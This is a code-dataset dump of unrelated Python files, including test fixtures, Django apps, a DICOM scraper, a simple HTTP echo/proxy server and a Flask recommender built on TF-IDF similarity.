run_sequential(tmpdir):\n \"\"\"Uses a file lock to run tests using this fixture, sequentially\n\n \"\"\"\n with FileLock('test.lock', timeout=15):\n yield()\n\n\ndef _setup_nubia():\n from suzieq.cli.sq_nubia_plugin import NubiaSuzieqPlugin\n from nubia import Nubia\n # monkey patching -- there might be a better way\n plugin = NubiaSuzieqPlugin()\n plugin.create_context = create_context\n\n # this is just so that context can be created\n shell = Nubia(name='test', plugin=plugin)\n\n\ndef create_context():\n config = load_sq_config(config_file=create_dummy_config_file())\n context = NubiaSuzieqContext()\n context.cfg = config\n context.schemas = Schema(config[\"schema-directory\"])\n return context\n\n\ndef create_dummy_config_file(\n datadir: str = './tests/data/basic_dual_bgp/parquet-out'):\n config = {'data-directory': datadir,\n 'temp-directory': '/tmp/suzieq',\n 'logging-level': 'WARNING',\n 'test_set': 'basic_dual_bgp', # an extra field for testing\n 'rest': {'API_KEY': '68986cfafc9d5a2dc15b20e3e9f289eda2c79f40'},\n 'analyzer': {'timezone': 'GMT'},\n }\n fd, tmpfname = mkstemp(suffix='.yml')\n f = os.fdopen(fd, 'w')\n f.write(yaml.dump(config))\n f.close()\n\n return tmpfname\n\n\ndef load_up_the_tests(dir):\n \"\"\"reads the files from the samples directory and parametrizes the test\"\"\"\n tests = []\n\n for i in dir:\n if not i.path.endswith('.yml'):\n continue\n with open(i, 'r') as f:\n out = yaml.load(f.read(), Loader=yaml.BaseLoader)\n # The format of the YAML file assumed is as follows:\n # description: \n # tests:\n # - command: , not used yet\n # marks: \n # output: |\n # \n #\n # - command:\n # ....\n if out and 'tests' in out:\n for t in out['tests']:\n # We use tags to dynamically mark the parametrized test\n # the marks MUST be registered in pytest.ini\n markers = []\n if 'marks' in t:\n markers = [MarkDecorator(Mark(x, [], {}))\n for x in t['marks'].split()]\n if 'xfail' in t:\n except_err = None\n if 'raises' in t['xfail']:\n except_err = globals()['__builtins__'].get(\n t['xfail']['raises'], None)\n\n if except_err:\n markers += [pytest.mark.xfail(\n reason=t['xfail']['reason'],\n raises=except_err)]\n else:\n if 'reason' in t['xfail']:\n markers += [pytest.mark.xfail(\n reason=t['xfail']['reason'])]\n else:\n markers += [pytest.mark.xfail()]\n if markers:\n tests += [pytest.param(t, marks=markers,\n id=t['command'])]\n else:\n tests += [pytest.param(t, id=t['command'])]\n return tests\n\n\ndef setup_sqcmds(testvar, context_config):\n sqcmd_path = [sys.executable, suzieq_cli_path]\n\n if 'data-directory' in testvar:\n # We need to create a tempfile to hold the config\n cfgfile = create_dummy_config_file(datadir=testvar['data-directory'])\n sqcmd_path += ['--config={}'.format(cfgfile)]\n\n exec_cmd = sqcmd_path + shlex.split(testvar['command'])\n\n output = None\n error = None\n try:\n output = check_output(exec_cmd)\n except CalledProcessError as e:\n error = e.output\n\n if cfgfile:\n os.remove(cfgfile)\n\n return output, error\n\n\ndef validate_host_shape(df: pd.DataFrame, ns_dict: dict):\n '''For the given DF, validate that the number of hosts is accurate'''\n for ns in ns_dict:\n if ns in df.namespace.unique():\n assert df.query(\n f'namespace == \"{ns}\"').hostname.nunique() == ns_dict[ns]\n","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":7076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"586526452","text":"import sys\nimport os\n\nif os.path.isdir('library'):\n sys.path.insert(0, os.getcwd() + '/library')\n\nimport logging\nimport re\nimport random\nimport json\n\n# pip packages\nimport lxml.html as lh\n\nimport helpers\n\nfrom helpers import get\nfrom website import Website\n\nclass Dicom:\n def getInformation(self):\n for self.ciodIndex, ciod in enumerate(self.ciods):\n try:\n newItems = self.getCiod(self.ciods[ciod])\n self.output(newItems)\n except Exception as e:\n helpers.handleException(e)\n\n def getCiod(self, ciod):\n results = []\n\n ciodId = get(ciod, 'id')\n\n found = False\n\n self.moduleIndex = 0\n\n # get the things it links to\n for linkToModule in self.ciodToModules:\n if get(linkToModule, 'ciod') == ciodId:\n logging.info(f'CIOD: {self.ciodIndex + 1} of {len(self.ciods)}: {ciodId}. Module: {self.moduleIndex + 1}: {get(linkToModule, \"module\")}.')\n\n self.moduleIndex += 1\n\n newItems = self.getModule(ciod, linkToModule)\n \n results += newItems\n\n found = True\n # reached end of possible results\n elif found:\n break\n\n return results\n\n def getModule(self, ciod, linkToModule):\n results = []\n\n moduleId = get(linkToModule, 'module')\n\n # get the main object\n module = get(self.modules, moduleId)\n \n found = False\n\n # get the things it links to\n for linkToAttribute in self.moduleToAttributes:\n if get(linkToAttribute, 'module') == moduleId:\n self.outputUrl(ciod, linkToAttribute)\n\n newItem = self.getAttribute(ciod, module, linkToAttribute)\n\n if newItem:\n results.append(newItem)\n \n found = True\n # reached end of possible results\n elif found:\n break\n\n return results\n\n def getAttribute(self, ciod, module, linkToAttribute):\n result = {\n 'CIOD': get(ciod, 'name'), \n 'module': get(module, 'name')\n }\n\n tag = get(linkToAttribute, 'tag')\n\n # get the main object\n tag = tag.replace(',', '')\n tag = tag.replace('(', '')\n tag = tag.replace(')', '')\n tag = tag.lower()\n\n attribute = get(self.attributes, tag)\n\n if not attribute:\n return {}\n\n # the keys we want and what name to use for the output\n keys = {\n 'tag_number': 'tag',\n 'tag_keyword': 'keyword',\n 'tag_value_multiplicity': 'valueMultiplicity',\n 'tag_value_representation': 'valueRepresentation'\n }\n\n for key in keys:\n result[key] = get(attribute, keys[key])\n\n # add the name\n if key == 'tag_value_representation':\n result[key] = f'{get(self.valueRepresentations, result[key])} ({result[key]})' \n elif key == 'tag_keyword':\n\n result[key] = self.getKeywordString(linkToAttribute)\n \n # to keep the right order of columns in the output file\n # add the name \n type = get(linkToAttribute, 'type')\n result['tag_type'] = f'{get(self.types, type)} ({type})'\n\n website = Website()\n html = get(linkToAttribute, 'description')\n plainText = website.getXpath(html, \".\", True)\n plainText = plainText.strip()\n\n result['tag_description'] = plainText\n result['tag_description_code_dict'] = self.getCodeDictionary(ciod, module, linkToAttribute, attribute)\n\n return result\n\n def getKeywordString(self, linkToAttribute):\n result = 'ds.'\n\n moduleId = get(linkToAttribute, 'module')\n \n path = get(linkToAttribute, 'path')\n path = path.replace(moduleId + ':', '')\n\n parts = path.split(':')\n\n newParts = []\n\n for i, part in enumerate(parts):\n attribute = get(self.attributes, part)\n\n if not attribute:\n continue\n\n newPart = get(attribute, 'keyword')\n\n newParts.append(newPart)\n\n result += '[0].'.join(newParts)\n\n return result\n\n def getCodeDictionary(self, ciod, module, linkToAttribute, attribute):\n result = {}\n \n for externalReference in get(linkToAttribute, 'externalReferences'):\n referenceUrl = get(externalReference, 'sourceUrl')\n\n reference = get(self.references, referenceUrl)\n\n # parse the html\n website = Website()\n\n # get the terms tables \n elements = website.getXpath(reference, \"//dl[../p/strong/text() = 'Defined Terms:' or ../p/strong/text() = 'Enumerated Values:']\")\n\n for element in elements:\n terms = website.getXpathInElement(element, \"//dt\")\n definitions = website.getXpathInElement(element, \"//dd\")\n\n # pairs of dt and dd tags\n for i, term in enumerate(terms):\n if i >= len(definitions):\n break\n\n term = term.text_content().strip()\n definition = definitions[i].text_content().strip()\n \n result[term] = definition\n\n if str(result) == \"{'DCMR': 'DICOM Content Mapping Resource', 'SDM': 'SNOMED DICOM Microglossary (Retired)'}\":\n result = ''\n\n return result\n\n def output(self, newItems):\n if not newItems:\n return\n\n fields = []\n\n for key in newItems[0]:\n fields.append(key)\n\n if not os.path.exists(self.outputFile):\n helpers.toFile(','.join(fields), self.outputFile)\n\n logging.info(f'Writing results {self.outputFile}')\n \n for i, item in enumerate(newItems):\n\n line = []\n\n for key in fields:\n line.append(get(item, key))\n\n helpers.appendCsvFile(line, self.outputFile)\n\n def outputUrl(self, ciod, linkToAttribute):\n ciodId = get(ciod, 'id')\n \n path = get(linkToAttribute, 'path')\n path = path.replace(':', '/')\n\n url = f'https://dicom.innolitics.com/ciods/{ciodId}/{path}'\n\n helpers.appendToFile(url, self.urlListFile)\n\n def getJsonFile(self, fileName):\n if not '/' in fileName:\n fileName = os.path.join(self.options['inputDirectory'], fileName)\n\n file = helpers.getFile(fileName)\n \n return json.loads(file)\n\n def __init__(self, options):\n self.options = options\n\n # top level\n self.ciods = self.getJsonFile('ciods.json')\n\n # link to second level\n self.ciodToModules = self.getJsonFile('ciod_to_modules.json')\n\n # second level\n self.modules = self.getJsonFile('modules.json')\n\n # link to third level\n self.moduleToAttributes = self.getJsonFile('module_to_attributes.json')\n \n # link to third level\n self.attributes = self.getJsonFile('attributes.json')\n\n # detailed description for an attribute\n self.references = self.getJsonFile('references.json')\n\n self.types = self.getJsonFile('resources/tag-types.json')\n\n self.valueRepresentations = self.getJsonFile('resources/tag-value-representations.json')\n\n self.outputFile = os.path.join('output', 'results.csv')\n self.urlListFile = os.path.join('output', 'urls.csv') \n \n helpers.makeDirectory('output')\n \n helpers.removeFile(self.outputFile)\n helpers.removeFile(self.urlListFile)\n\nclass Main:\n def run(self):\n self.dicom.getInformation()\n self.cleanUp()\n\n def cleanUp(self):\n logging.info('Done')\n\n def __init__(self):\n helpers.setUpLogging()\n \n logging.info('Starting')\n\n self.options = {\n 'inputDirectory': 'input'\n }\n\n # read the options file\n helpers.setOptions('options.ini', self.options)\n\n self.dicom = Dicom(self.options)\n\nmain = Main()\nmain.run()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"10603223","text":"import os\nimport glob\nimport cv2\nimport json\n\nfrom coords import toInt\nfrom dataset import *\n\ndataset_path = 'dataset_actual/'\n\nimage_filenames = get_image_filenames(dataset_path)\nannotation_filenames = get_annotation_filenames(image_filenames)\ncolor_map = get_colors(dataset_path)\n\nprint('Imgs found: ' + str(len(image_filenames)))\n\nfor img_fname, ann_fname in zip(image_filenames, annotation_filenames):\n with open(ann_fname) as f:\n img = cv2.imread(img_fname)\n for obj in json.load(f)['objects']:\n class_title = obj['classTitle']\n pts = obj['points']['exterior']\n pts = [tuple(toInt(pt)) for pt in pts]\n class_color = color_map[class_title]\n cv2.rectangle(img, pts[0], pts[1], class_color)\n cv2.putText(img, class_title, pts[0], cv2.FONT_HERSHEY_SIMPLEX, 0.7, (255, 255, 255))\n cv2.imshow('img', img)\n if cv2.waitKey(0) == 27:\n exit()","sub_path":"view_annotation.py","file_name":"view_annotation.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"269188351","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('accounts', '0005_auto_20150404_2142'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Asset',\n fields=[\n ('id', models.AutoField(auto_created=True, serialize=False, primary_key=True, verbose_name='ID')),\n ('symbol', models.CharField(max_length=10, unique=True)),\n ('description', models.CharField(max_length=64)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.RemoveField(\n model_name='holding',\n name='symbol',\n ),\n migrations.AddField(\n model_name='holding',\n name='asset',\n field=models.ForeignKey(to='accounts.Asset', blank=True, null=True),\n preserve_default=True,\n ),\n ]\n","sub_path":"financemanagerapi/accounts/migrations/0006_auto_20150414_0340.py","file_name":"0006_auto_20150414_0340.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"32270746","text":"#!/usr/bin/env python\n\nfrom BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer\nimport StringIO\nimport argparse\nimport logging\nimport os\nimport random\nimport sys\nimport urllib2\n\nlogging.basicConfig()\n\nlogger = logging.getLogger(__name__)\n\nclass EchoHTTPRequestHandler(BaseHTTPRequestHandler):\n def do_HEAD(self):\n self.do_GET(method='HEAD', body=False)\n \n def do_GET(self, method='GET', body=True):\n try:\n try:\n sio = StringIO.StringIO()\n sio.write('====BEGIN REQUEST=====\\n')\n sio.write(self.command)\n sio.write(' ')\n sio.write(self.path)\n sio.write(' ')\n sio.write(self.request_version)\n sio.write('\\n')\n for line in self.headers.headers:\n sio.write(line)\n sio.write('\\n')\n #if self.rfile:\n # sio.write(self.rfile.read())\n sio.write('\\n')\n sio.write('====END REQUEST=======\\n')\n logger.info(sio.getvalue())\n \n self.send_response(200)\n self.send_header('Content-Type', 'text/plain')\n self.send_header('Content-Length', str(len(sio.getvalue())))\n self.end_headers()\n if body:\n self.wfile.write(sio.getvalue())\n return\n finally:\n sio.close()\n except IOError:\n self.send_error(404, 'file not found')\n \n\n#\n\nclass ProxyHTTPRequestHandler(BaseHTTPRequestHandler):\n def do_HEAD(self):\n self.do_GET(body=False)\n \n def do_GET(self, body=True):\n sent = False\n try:\n req = None\n resp = None\n sio = StringIO.StringIO()\n try:\n hostname = self.headers.getheader('Host')\n if not hostname:\n hostname = 'localhost'\n url = 'http://{}{}'.format(hostname, self.path)\n req = urllib2.Request(url=url)\n sio.write('====BEGIN REQUEST=====\\n')\n sio.write(url)\n sio.write('\\n')\n sio.write(self.command)\n sio.write(' ')\n sio.write(self.path)\n sio.write(' ')\n sio.write(self.request_version)\n sio.write('\\n')\n for line in self.headers.headers:\n line_parts = [o.strip() for o in line.split(':', 1)]\n if len(line_parts) == 2:\n if line_parts[0].startswith('X-'):\n pass\n elif line_parts[0] in ('Connection','User-Agent'):\n pass\n else:\n sio.write(line)\n req.add_header(*line_parts)\n sio.write('\\n')\n sio.write('====END REQUEST=======\\n')\n logger.error(sio.getvalue())\n try:\n resp = urllib2.urlopen(req)\n except urllib2.HTTPError as e:\n if e.getcode():\n resp = e\n else:\n self.send_error(599, u'error proxying: {}'.format(unicode(e)))\n sent = True\n return\n self.send_response(resp.getcode())\n respheaders = resp.info()\n for line in respheaders.headers:\n line_parts = line.split(':', 1)\n if len(line_parts) == 2:\n self.send_header(*line_parts)\n self.end_headers()\n sent = True\n if body:\n self.wfile.write(resp.read())\n return\n finally:\n if resp:\n resp.close()\n sio.close()\n except IOError as e:\n if not sent:\n self.send_error(404, 'error trying to proxy: {}'.format(str(e)))\n\ndef parse_args(argv=sys.argv[1:]):\n parser = argparse.ArgumentParser(description='Either Proxy or Echo HTTP requests')\n parser.add_argument('--port', dest='port', type=int, default=random.randint(20000, 60000),\n help='serve HTTP requests on specified port (default: random)')\n parser.add_argument('--type', dest='server_type', choices=['echo', 'proxy'], default='echo',\n help='Whether to run as a proxy server or echo server')\n args = parser.parse_args(argv)\n return args\n\ndef main(argv=sys.argv[1:]):\n args = parse_args(argv)\n print('http server is starting on port {}...'.format(args.port))\n server_address = ('127.0.0.1', args.port)\n if args.server_type == 'proxy':\n httpd = HTTPServer(server_address, ProxyHTTPRequestHandler)\n else:\n httpd = HTTPServer(server_address, EchoHTTPRequestHandler)\n print('http server is running as {}...'.format(args.server_type))\n httpd.serve_forever()\n \nif __name__ == '__main__':\n main()\n","sub_path":"all-gists/6194156/snippet.py","file_name":"snippet.py","file_ext":"py","file_size_in_byte":5140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"66960099","text":"class Gesture:\n\tresults = {}\n\tdef __init__(self):\n\t\tif not Gesture.results:\n\t\t\tself.populate();\n\t\t\n\tdef compare_value(self, left, right):\n\t\tresult = Gesture.results[left][right]\n\t\tif result[0] == 0:\n\t\t\treturn (0, \"It was a draw\")\n\t\telif result[0] == 1:\n\t\t\treturn result\n\t\telse:\n\t\t\treturn (-1, Gesture.results[right][left][1])\n\t\n\tdef populate(self):\n\t\tvalues = Gesture.results\n\t\tvalues[\"rock\"] = {}\n\t\tvalues[\"rock\"][\"rock\"] = (0, \"\")\n\t\tvalues[\"rock\"][\"paper\"] = (-1, \"\")\n\t\tvalues[\"rock\"][\"scissors\"] = (1, \"Rock crushes scissors.\")\n\t\tvalues[\"rock\"][\"lizard\"] = (1, \"Rock crushes lizard.\")\n\t\tvalues[\"rock\"][\"spock\"] = (-1, \"\")\n\t\tvalues[\"paper\"] = {}\n\t\tvalues[\"paper\"][\"rock\"] = (1, \"Paper covers rock.\")\n\t\tvalues[\"paper\"][\"paper\"] = (0, \"\")\n\t\tvalues[\"paper\"][\"scissors\"] = (-1, \"\")\n\t\tvalues[\"paper\"][\"lizard\"] = (-1, \"\")\n\t\tvalues[\"paper\"][\"spock\"] = (1, \"Paper disproves Spock.\")\n\t\tvalues[\"scissors\"] = {}\n\t\tvalues[\"scissors\"][\"rock\"] = (-1, \"\")\n\t\tvalues[\"scissors\"][\"paper\"] = (1, \"Scissors cuts paper.\")\n\t\tvalues[\"scissors\"][\"scissors\"] = (0, \"\")\n\t\tvalues[\"scissors\"][\"lizard\"] = (1, \"Scissors decapitates lizard.\")\n\t\tvalues[\"scissors\"][\"spock\"] = (-1, \"\")\t\n\t\tvalues[\"lizard\"] = {}\n\t\tvalues[\"lizard\"][\"rock\"] = (-1, \"\")\n\t\tvalues[\"lizard\"][\"paper\"] = (1, \"Lizard eats paper\")\n\t\tvalues[\"lizard\"][\"scissors\"] = (-1, \"\")\n\t\tvalues[\"lizard\"][\"lizard\"] = (0, \"\")\n\t\tvalues[\"lizard\"][\"spock\"] = (1, \"Lizard poisons Spock\")\t\n\t\tvalues[\"spock\"] = {}\n\t\tvalues[\"spock\"][\"rock\"] = (1, \"Spock vaporizes rock\")\n\t\tvalues[\"spock\"][\"paper\"] = (-1, \"\")\n\t\tvalues[\"spock\"][\"scissors\"] = (1, \"Spock smashes scissors\")\n\t\tvalues[\"spock\"][\"lizard\"] = (-1, \"\")\n\t\tvalues[\"spock\"][\"spock\"] = (0, \"\")\t\n\t\t\t\n\t\t","sub_path":"gesture.py","file_name":"gesture.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"556582742","text":"from django.core.paginator import Paginator, PageNotAnInteger, EmptyPage\nfrom django.shortcuts import render\nfrom django.views.generic import ListView\nfrom math import ceil\nfrom apps.accounts.mixins import JsonResponseMixin\nfrom apps.orders.models import Order, Status\n\n\nclass OrderServiceListView(JsonResponseMixin, ListView):\n\tmodel = Order\n\ttemplate_name = 'orders.html'\n\tpaginate_by = 2\n\n\tdef get(self, request, *args, **kwargs):\n\t\tself.object_list = self.get_queryset()\n\t\treturn self.response_handler()\n\n\tdef get_context_data(self, **kwargs):\n\t\tcontext = super(OrderServiceListView, self).get_context_data(**kwargs)\n\t\tpage = self.request.GET.get('page')\n\t\tcontext.update({'status': Status.objects.all(),\n\t\t 'page': page,\n\t\t 'service_name': self.kwargs.get('service')})\n\t\treturn context\n\n\tdef get_data(self):\n\t\t# Acerca del paginador\n\t\t# https://docs.djangoproject.com/en/1.7/topics/pagination/\n\t\tpaginator = Paginator(self.object_list, self.paginate_by)\n\t\tpage = self.request.GET.get('page')\n\n\t\ttry:\n\t\t\torders = paginator.page(page)\n\t\texcept PageNotAnInteger:\n\t\t\torders = paginator.page(1)\n\t\t\tpage = 1\n\t\texcept EmptyPage:\n\t\t\torders = paginator.page(paginator.num_pages)\n\t\t\tpage = paginator.num_pages\n\n\t\tdata = [{'reference': order.reference,\n\t\t 'description': order.description,\n\t\t 'service': order.service.name,\n\t\t 'date': order.date,\n\t\t 'status': order.status.name\n\t\t } for order in orders.object_list]\n\n\t\tdata.append({'page': page,\n\t\t 'label': str(orders),\n\t\t 'next': orders.has_next(),\n\t\t 'prev': orders.has_previous(),\n\t\t 'base_url': self.request.path,\n\t\t 'page_range': paginator.num_pages})\n\n\t\treturn data\n\n\tdef get_queryset(self):\n\t\tservice_name = self.kwargs['service']\n\n\t\tif self.kwargs.get('status'):\n\t\t\tqueryset = self.model.objects\\\n\t\t\t\t.filter(service__slug=service_name)\\\n\t\t\t\t.filter(status__slug=self.kwargs['status'])\\\n\t\t\t\t.order_by('-date')\n\t\telse:\n\t\t\tqueryset = self.model.objects.filter(service__slug=service_name).order_by('-date')\n\t\treturn queryset","sub_path":"apps/services/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"247775811","text":"import urllib\nimport utils\nfrom BeautifulSoup import BeautifulSoup\n\nclass UrhoParser:\n def __init__(self):\n self.song_urls = []\n\n def parse_song_urls(self, url):\n f = urllib.urlopen(url)\n s = f.read()\n f.close()\n soup = BeautifulSoup(s)\n anchors = soup.findAll('a')\n self.song_urls = [ song['href'] for song in anchors if 'href' in song.attrs[0] and song['href'].startswith(\"/UrhoMatti:\") ]\n return self.song_urls\n\n def parse_song_from_url(self, url):\n f = urllib.urlopen(url)\n s = f.read()\n f.close()\n soup = BeautifulSoup(s)\n header = soup.findAll(\"h1\", id=\"firstHeading\")[0].contents[0]\n try:\n lyrics = utils.remove_html_tags(str(soup.find(\"div\", \"lyrics\").contents[1]))\n except AttributeError:\n lyrics = \"Couldn't parse lyrics\"\n\n return [header, lyrics]\n","sub_path":"urhoParser.py","file_name":"urhoParser.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"33274106","text":"# coding:utf-8\nimport xlwt\nimport csv\n\n\ndef check(row):\n\n count = len(row)\n count_t = 0\n\n if not isinstance(row, list):\n return False\n\n for c in row:\n if c == None or c == '':\n count_t += 1\n\n if count_t == count:\n return False\n\n return True\n\ndef covert_csv_to_excel(src, encoding=\"utf-8\"):\n style = xlwt.XFStyle()\n font = xlwt.Font()\n font.name = 'SimSun'\n style.font = font\n workbook = xlwt.Workbook(encoding=encoding)\n worksheet = workbook.add_sheet(\"sheet1\", cell_overwrite_ok=True)\n r = -1\n\n with open(src, 'rb') as f:\n reader = csv.reader(f)\n for _, row in enumerate(reader):\n if check(row):\n r += 1\n else:\n continue\n for c, col in enumerate(row):\n worksheet.write(r, c, col, style)\n workbook.save(src + '.xls')\n\ncovert_csv_to_excel('shdmu.csv')","sub_path":"day2/csv_to_excel.py","file_name":"csv_to_excel.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"186017861","text":"from django.core.management.base import BaseCommand\nfrom django.core.management import call_command\nfrom django.contrib.auth.models import Group, User\n\nfrom faker import Faker\nfrom faker.providers import BaseProvider\nfrom core.models import UrineDrugScreen,Medication,EmployeeRole,Employee,BehavioralHealthNotes\nfrom core.participants.models import Participant, Gender, Race\nfrom core.permissions import CASE_MANAGER, FRONT_DESK, ADMIN\nfrom datetime import datetime, date\nimport random, re\n\nfake = Faker()\n\nDEFAULT_DEV_ENV_PASS = 'password123'\nDEFAULT_GROUPS = [FRONT_DESK, CASE_MANAGER, ADMIN]\n\nclass Command(BaseCommand):\n help = \"seed database for testing and development.\"\n\n def handle(self, *args, **options):\n run_seed(self)\n\n\nclass MedsProvider(BaseProvider):\n __provider__ = \"meds\"\n __lang__ = \"en_US\"\n\n def meds(self):\n meds = [u'film', u'tab', u'vivitrol']\n return random.choices(meds)\n\n\nfake.add_provider(MedsProvider)\n\n\nclass FrequencyProvider(BaseProvider):\n __provider__ = \"frequency\"\n __lang__ = \"en_US\"\n\n def frequency(self):\n frequency = [7, 14, 28, 21, 3]\n return random.choices(frequency)\n\n\nfake.add_provider(FrequencyProvider)\n\ndef run_seed(self):\n call_command('migrate')\n call_command('flush')\n create_groups()\n create_users()\n add_users_to_groups()\n create_participants()\n\ndef create_users(output=True):\n for group in DEFAULT_GROUPS:\n email = \"{}@{}.com\".format(group, group)\n u = User.objects.create_user(username=group, email=email)\n u.set_password(DEFAULT_DEV_ENV_PASS)\n\n if group == ADMIN:\n u.is_superuser=True\n u.is_staff=True\n\n u.save()\n\n if output:\n print(\"Created user: {}\".format(email))\n\ndef create_groups(output=True):\n for group in DEFAULT_GROUPS:\n Group.objects.get_or_create(name=group)\n if output:\n print(\"Created group: {}\".format(group))\n\ndef add_users_to_groups(output=True):\n \"\"\"\n adds user to group of same name\n \"\"\"\n\n for group in DEFAULT_GROUPS:\n user = User.objects.get(username=group)\n role_title = Group.objects.get(name=group)\n user.groups.add(role_title)\n\ndef create_participants():\n gender_list = list(Gender)\n race_list = list(Race)\n\n for _ in range(10):\n last_four = fake.ssn(taxpayer_identification_number_type=\"SSN\")[-4:]\n profile = fake.profile()\n gender = random.choice(gender_list)\n race = random.choice(race_list)\n\n participant = Participant(\n first_name=fake.first_name(),\n last_name=fake.last_name(),\n pp_id=\"todo\",\n gender=gender.value,\n race=race.value,\n last_four_ssn=last_four,\n date_of_birth=profile['birthdate'],\n start_date=fake.date_time(),\n )\n participant.full_clean()\n participant.save()\n create_uds_results(participant)\n create_medication(participant)\n\ndef random_bool():\n return bool(random.getrandbits(1))\n\ndef create_medication(participant):\n meds = Medication(\n participant=participant,\n medication_name=fake.meds()[0],\n ingestion_frequency=fake.frequency()[0],\n medical_delivery=fake.sentence(nb_words=3, variable_nb_words=True, ext_word_list=None)\n )\n meds.full_clean()\n meds.save()\n\ndef create_uds_results(participant):\n for _ in range(random.randint(2,10)):\n test_date = fake.date_time_between(start_date=participant.start_date, end_date='+5y')\n\n uds = UrineDrugScreen(\n participant=participant,\n uds_temp=random.randint(85,105),\n date_of_test=test_date,\n pregnancy_test=random_bool(),\n opiates=random_bool(),\n fentanyl=random_bool(),\n bup=random_bool(),\n coc=random_bool(),\n amp=random_bool(),\n m_amp=random_bool(),\n thc=random_bool(),\n mtd=random_bool(),\n pcp=random_bool(),\n bar=random_bool(),\n bzo=random_bool(),\n tca=random_bool(),\n oxy=random_bool(),\n )\n\n uds.full_clean()\n uds.save()\n\n","sub_path":"core/management/commands/seed.py","file_name":"seed.py","file_ext":"py","file_size_in_byte":4335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"651070301","text":"\"\"\"\nAuthor: Sandeep Shenoy sandeepjshenoy@gmail.com\n\"\"\"\n\n\ndef rle(A):\n N = len(A)\n if N <= 2:\n return None\n m = N - 2\n for t in range(m, 1, -1):\n i = 0\n # print(\"%d\" %t)\n while t + i < N - 1:\n print_rle(A, i, t, N)\n #print(A[0:i+1] + str(t) + A[t + i + 1: N])\n i += 1\n\n\ndef print_rle(A, i, t, N):\n for i in range(0, i + 1):\n print(\"%s\" % A[i], end=\"\")\n print(\"%s\" % t, end=\"\")\n for i in range(t + i + 1, N):\n print(\"%s\" % A[i], end=\"\")\n print(\"\")\n\n\ndef main():\n A = 'abcdefghi'\n rle(A)\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"IK/Strings/RLE.py","file_name":"RLE.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"21680725","text":"from flask import Flask, request, render_template\r\nimport pandas as pd\r\n\r\n\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom sklearn.metrics.pairwise import sigmoid_kernel\r\n\r\n# def get_info(c_name):\r\n# xl = pd.ExcelFile('data_for_content_based - Ext.xlsx')\r\n# df = xl.parse('Sheet1')\r\n \r\n# rslt_df = df[df['Name'] == c_name].Overview.to_string()\r\n\r\n# return rslt_df\r\n \r\n\r\ndef give_rec(title):\r\n \r\n cleaned_df = pd.read_csv('cleaneddf.csv', index_col=0)\r\n \r\n tfv = TfidfVectorizer(min_df=3, max_features=None, \r\n strip_accents='unicode', analyzer='word',token_pattern=r'\\w{1,}',\r\n ngram_range=(1, 3),\r\n stop_words = 'english')\r\n \r\n # Filling NaNs with empty string\r\n cleaned_df['Overview'] = cleaned_df['Overview'].fillna('')\r\n \r\n # Fitting the TF-IDF on the 'Overview' text\r\n tfv_matrix = tfv.fit_transform(cleaned_df['Overview'])\r\n \r\n # Compute the sigmoid kernel\r\n sig = sigmoid_kernel(tfv_matrix, tfv_matrix)\r\n \r\n \r\n # Reverse mapping of indices and movie titles\r\n indices = pd.Series(cleaned_df.index, index=cleaned_df['Name']).drop_duplicates()\r\n \r\n \r\n company = 'CareSuites'\r\n index_no = indices[company]\r\n \r\n \r\n list(enumerate(sig[indices[company]]))\r\n \r\n sorted(list(enumerate(sig[indices[company]])), key=lambda x: x[1], reverse=True)\r\n\r\n # Get the index corresponding to original_title\r\n idx = indices[title]\r\n\r\n # Get the pairwsie similarity scores \r\n sig_scores = list(enumerate(sig[idx]))\r\n\r\n # Sort the Companies \r\n sig_scores = sorted(sig_scores, key=lambda x: x[1], reverse=True)\r\n\r\n # Scores of the 10 most similar Company\r\n sig_scores = sig_scores[1:11]\r\n\r\n # Company indices\r\n company_indices = [i[0] for i in sig_scores]\r\n\r\n # Top 10 most similar Companies\r\n # a = cleaned_df['Name'].iloc[company_indices] + ', ' + cleaned_df['Location'].iloc[company_indices]\r\n\r\n a = cleaned_df['Name'].iloc[company_indices] + ', ' + cleaned_df['Location'].iloc[company_indices]\r\n arr = a.tolist()\r\n return arr\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route('/')\r\ndef home():\r\n return render_template('home.html')\r\n\r\n@app.route('/recommend', methods=['POST'])\r\ndef recommend():\r\n '''\r\n For rendering results on HTML GUI\r\n '''\r\n c_name = request.form['c_name']\r\n model = give_rec(c_name)\r\n # info = get_info(c_name)\r\n return render_template('recommend.html',c_name=c_name,r=model)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True)\r\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} 